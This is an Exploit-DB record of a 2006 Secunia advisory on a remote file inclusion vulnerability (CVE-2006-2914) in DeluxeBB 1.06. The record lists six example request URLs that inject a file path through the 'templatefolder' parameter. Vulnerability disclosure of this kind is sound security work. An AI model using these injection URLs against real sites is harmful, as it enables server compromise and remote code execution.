DeluxeBB <= 1.06 templatefolder Remote File Include Vulnerabilities

2006-06-15T00:00:00
ID EDB-ID:1916
Type exploitdb
Reporter Andreas Sandblad
Modified 2006-06-15T00:00:00

Description

DeluxeBB <= 1.06 (templatefolder) Remote File Include Vulnerabilities. CVE-2006-2914. Webapps exploit for php platform

                                        
                                            Secunia Research has discovered some vulnerabilities in DeluxeBB,
which can be exploited by malicious people to conduct SQL injection
attacks and compromise a vulnerable system.

1) Input passed to the "templatefolder" parameter in various scripts
isn't properly verified, before it is used to include files. This can
be exploited to include arbitrary files from external and local
resources.

Examples:
http://[host]/templates/deluxe/postreply.php?templatefolder=[file]
http://[host]/templates/deluxe/posting.php?templatefolder=[file]
http://[host]/templates/deluxe/pm/newpm.php?templatefolder=[file]
http://[host]/templates/default/postreply.php?templatefolder=[file]
http://[host]/templates/default/posting.php?templatefolder=[file]
http://[host]/templates/default/pm/newpm.php?templatefolder=[file]

# milw0rm.com [2006-06-15]